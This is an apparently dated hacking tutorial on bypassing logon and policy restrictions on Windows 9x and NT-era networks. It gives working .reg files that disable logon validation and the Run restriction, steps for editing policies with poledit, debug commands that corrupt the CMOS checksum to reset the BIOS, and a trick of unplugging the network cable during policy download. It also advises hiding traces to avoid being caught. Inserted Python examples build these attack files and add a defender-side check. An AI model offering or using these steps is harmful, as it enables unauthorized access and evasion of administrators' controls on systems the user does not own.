Hack into Windows Network
by Chris Zhang
I have read lots of articles embracing various methods of
hacking into Windows networks. Apart from NetBIOS attacks,
the majority of them concern attacking the registry. Not to
impugn these authors, but their hacking tutorials reflect a
very limited understanding of the registry's structure and
how exactly it works. They probably know perfectly well how
to use the registry, but not the knowledge behind it. Okay,
enough of my guff.
Let's start.
DOS ATTACK (local computers, or networked computers attacked
at the console ONLY)
Say you have this situation:
NO user name and password are given
NO BIOS password prompt is active
An A: or CD-ROM drive is present and functional (so you can
boot your own DOS)
Basic principle: make your own registry file which
re-enables the functions that were disabled on your target
computer, then import it into the system registry and
restart the computer or refresh the system.
Copy the following and save it as a *.reg file. The first
line must be exactly REGEDIT4 followed by a blank line; that
is the only header the Windows 95/98 regedit accepts, and
dword values are written as eight hex digits:
REGEDIT4

[HKEY_LOCAL_MACHINE\Network\Logon]
"MustBeValidated"=dword:00000000

Boot the computer to real-mode DOS from your floppy or CD
and copy the file to a path like C:\. Then type (the first
line puts regedit.exe on the search path; use whatever name
you gave the file):
path c:\windows
regedit logon.reg
You will see a message like 'successfully'. Restart the
computer and see what happens.
This file lets you enter Windows without providing a user
name and password: simply click Cancel or press Esc at the
logon box. Registry names are case-insensitive, so the
capitalisation of the value name does not matter.
GUI ATTACK (networked computers)
Again, say you have this situation:
You have been granted an account with limited privileges
An Internet connection is available and you are allowed to
download
The A: drive is inaccessible but physically present
You are NOT on a Windows NT or 2000 network; the
administrator uses other programs, not system policies, to
restrict your access rights
Basic principle: write your own .reg file, send it to your
email box, then receive it on the target computer and run
the .reg file without saving it (for your own safety: you
might get caught if you do save it).
As in the DOS attack, copy the following and save it as a
*.reg file, then double-click it to import it. You can put
more values in the same file to enable more functions, for
example:
REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoRun"=dword:00000000

After importing the file you have to refresh the system. You
can log out and log back in, as long as you are not on a
Windows NT or 2000 network (there the policy is copied from
the server again at logon and would undo your change).
Otherwise press Ctrl+Alt+Del, select Explorer and click End
Task; when a box pops up asking you to confirm shutting down
or restarting the computer, press Cancel, then wait a few
seconds until another box comes up and click End Task there.
Explorer restarts and re-reads the policy keys, so all the
functions you have enabled take effect immediately.
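The DOS and GUI attacks above both come down to writing a REGEDIT4 file that sets a restriction value to zero. The following is an added example in Python, not code from the original article: it builds such a file for the two values the text quotes (MustBeValidated and NoRun), parses it back, and, from the defender's side, lists which restrictions a given .reg file switches off. The helper names and the sample file are this example's own; the key paths and value names are the ones quoted in the text.

```python
# Added example (Python, not from the original article): build the REGEDIT4
# files used in the DOS and GUI attacks above, parse them back, and flag
# which restriction values such a file switches off. The key and value names
# are the two the text quotes (MustBeValidated and NoRun); the helper names
# and the sample file below are this example's own. Windows 9x regedit only
# accepts the literal header REGEDIT4 and dword values as 8 hex digits.
import re

REG_HEADER = "REGEDIT4"

# Values that enforce a restriction when set to 1, as described in the text:
# MustBeValidated=1 forces a validated logon; NoRun=1 hides Start > Run.
# Lookups are case-insensitive because registry names are.
ENFORCING_VALUES = {
    (r"hkey_local_machine\network\logon", "mustbevalidated"): 1,
    (r"hkey_current_user\software\microsoft\windows\currentversion\policies\explorer", "norun"): 1,
}


def build_reg(entries):
    """Render {key: {name: int}} as REGEDIT4 text with DOS line endings."""
    lines = [REG_HEADER, ""]
    for key, values in entries.items():
        lines.append(f"[{key}]")
        for name, num in values.items():
            if not 0 <= num <= 0xFFFFFFFF:
                raise ValueError(f"{name}: dword out of range")
            lines.append(f'"{name}"=dword:{num:08x}')
        lines.append("")
    return "\r\n".join(lines)


_SECTION = re.compile(r"^\[(.+)\]$")
_DWORD = re.compile(r'^"([^"]+)"=dword:([0-9a-fA-F]{1,8})$')


def parse_reg(text):
    """Parse REGEDIT4 text back into {key: {name: int}}.

    Rejects files without the REGEDIT4 header (a Windows 2000-style
    "Windows Registry Editor Version 5.00" file is not importable on 9x)
    and any line that is not a section, a dword value, a comment or blank.
    """
    lines = [ln.strip() for ln in text.splitlines()]
    if not lines or lines[0] != REG_HEADER:
        raise ValueError("not a REGEDIT4 file")
    result, current = {}, None
    for ln in lines[1:]:
        if not ln or ln.startswith(";"):
            continue
        m = _SECTION.match(ln)
        if m:
            current = result.setdefault(m.group(1), {})
            continue
        m = _DWORD.match(ln)
        if m and current is not None:
            current[m.group(1)] = int(m.group(2), 16)
            continue
        raise ValueError(f"unsupported line: {ln!r}")
    return result


def disabled_restrictions(reg_text):
    """Defender-side check: (key, name) pairs the file sets to something other
    than the enforcing value, i.e. restrictions it would switch off."""
    found = []
    for key, values in parse_reg(reg_text).items():
        for name, num in values.items():
            enforce = ENFORCING_VALUES.get((key.lower(), name.lower()))
            if enforce is not None and num != enforce:
                found.append((key, name))
    return found


# Constructed sample: the two files from the text merged into one.
ATTACK_REG = build_reg({
    r"HKEY_LOCAL_MACHINE\Network\Logon": {"MustBeValidated": 0},
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer": {"NoRun": 0},
})

if __name__ == "__main__":
    print(ATTACK_REG)
    print(disabled_restrictions(ATTACK_REG))
```

Running the script prints the merged .reg file and then the two (key, name) pairs it disarms. The same check can be pointed at any .reg file that turns up in a mailbox or on a floppy, which is the obvious way for an administrator to spot this trick before the file is double-clicked.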
On a Windows NT or 2000 network the administrator uses
system policies to restrict your access rights.
Make sure hidden and system files are shown. Go to the
Windows folder, search for poledit.exe and double-click it.
An error message will pop up saying it can't find the .pol
file; no worries, click OK, then Cancel on the next box. Go
to Options, click Policy Template, then Add. Go to
<system drive>:\windows\inf, where you will see heaps of
.adm files; choose windows.adm and press OK. Then go to
File, Open Registry. What can you see? Change it around for
your own pleasure, mate.
If you want to know the whole network configuration, just
click File and go to the option below Exit.
DO REMEMBER to refresh the system (don't log out and back
in, which would reload the server policy; restart Explorer
the other way, as described above).
If you want access to the A: drive, first enable "show all
drives" in the policy. If that doesn't work, enable the DOS
prompt and use debug to poke the CMOS RAM through port 70h
(index) and port 71h (data). Type:
debug
-o 70 10
-o 71 0
-q
(the leading - is debug's prompt, not something you type; q
quits debug). Or make up any other numbers, as long as the
byte you write differs from the one already stored. The
point is to invalidate the CMOS checksum so that POST
reports a CMOS error on the next boot and loads the BIOS
defaults, which normally have the floppy drive enabled (this
is the "cheat POST" trick). Be aware that the defaults
replace every other BIOS setting as well.
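Why those two debug lines change the outcome of POST is easier to see with a model of what they write. The following is an added example in Python, not code from the original article. It assumes the classic AT CMOS layout (64 bytes, the floppy drive types at offset 10h, the BIOS configuration checksum taken over offsets 10h to 2Dh and stored high byte first at 2Eh and 2Fh); real BIOSes may differ, the sample CMOS image is constructed, and nothing here touches hardware. The script applies the exact lines from the text, then a write that stores the value already there, to show why the text says to pick numbers that differ.

```python
# Added example (Python, not from the original article): a model of the CMOS
# RAM that the debug lines above write to, showing why the write makes POST
# complain. It assumes the classic AT layout (64 bytes, floppy drive types at
# offset 10h, the BIOS configuration checksum over offsets 10h-2Dh stored
# high byte first at 2Eh-2Fh); real BIOSes may differ, and nothing here
# touches hardware. Port 70h selects the CMOS index, port 71h reads/writes it.

CHECKSUM_RANGE = range(0x10, 0x2E)   # 10h..2Dh inclusive
CHECKSUM_HI, CHECKSUM_LO = 0x2E, 0x2F
FLOPPY_TYPES = 0x10                  # high nibble = A:, low nibble = B:


def cmos_checksum(ram):
    """16-bit sum of the configuration bytes, as POST recomputes it."""
    return sum(ram[i] for i in CHECKSUM_RANGE) & 0xFFFF


def fresh_cmos():
    """Constructed sample: A: is a 1.44 MB drive (type 4), no B:, valid checksum."""
    ram = bytearray(64)
    ram[FLOPPY_TYPES] = 0x40
    ram[0x14] = 0x2F  # equipment byte: one floppy, colour display, coprocessor
    csum = cmos_checksum(ram)
    ram[CHECKSUM_HI], ram[CHECKSUM_LO] = csum >> 8, csum & 0xFF
    return ram


class CmosPorts:
    """Minimal model of the 70h/71h port pair that debug's O command drives."""

    def __init__(self, ram):
        self.ram = bytearray(ram)
        self.index = 0

    def out(self, port, value):
        if port == 0x70:
            self.index = value & 0x3F   # 64-byte CMOS; bit 7 is the NMI mask
        elif port == 0x71:
            self.ram[self.index] = value & 0xFF
        else:
            raise ValueError(f"port {port:02x}h is not a CMOS port")

    def stored_checksum(self):
        return (self.ram[CHECKSUM_HI] << 8) | self.ram[CHECKSUM_LO]

    def post_checksum_ok(self):
        """True if POST would accept the configuration as it stands."""
        return self.stored_checksum() == cmos_checksum(self.ram)


def run_debug_script(ram, script):
    """Apply debug 'O port byte' lines (leading '-' prompt allowed) to a CMOS
    image and report whether POST would still pass its checksum test."""
    ports = CmosPorts(ram)
    for line in script.strip().splitlines():
        parts = line.strip().lstrip("-").split()
        if len(parts) != 3 or parts[0].lower() != "o":
            raise ValueError(f"only 'O port byte' lines are modelled: {line!r}")
        ports.out(int(parts[1], 16), int(parts[2], 16))
    return ports.post_checksum_ok()


# The exact lines from the text: select index 10h, write 0.
TEXT_SCRIPT = "-O 70 10\n-O 71 0"

if __name__ == "__main__":
    print("POST ok after text script:", run_debug_script(fresh_cmos(), TEXT_SCRIPT))
    # Writing back the value already stored changes nothing, which is why the
    # text says to pick numbers that differ from what is there.
    print("POST ok after same-value write:", run_debug_script(fresh_cmos(), "-O 70 10\n-O 71 40"))
```

With the sample image the text's script turns the checksum stale (POST would fail and fall back to defaults), while writing 40h back to offset 10h leaves it valid. The same model also shows the failure case the text hints at: if the administrator had already set the floppy type to 0 in the BIOS, writing 0 again changes nothing, so a different byte or a different offset inside the checksummed range has to be used.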
Method 2: unplug the network cable while the policy is being
copied from the server; then you have full access to the
computer, but you are out of the network, no worries. Go to
the Windows folder, then the inf folder (hidden by default),
move the *.adm files to another path, then log back in.
Because the system can't find any restriction configuration
files, apparently the restrictions are not going to take
effect. One caveat: the .adm files are the templates poledit
uses to edit policies, while the restrictions actually
applied at logon come from the .pol file downloaded from the
server, so moving the templates alone may not be enough if
the cable is plugged back in.
Enjoy
Credits
Chris Zhang
dotnet_impressive@hotmail.com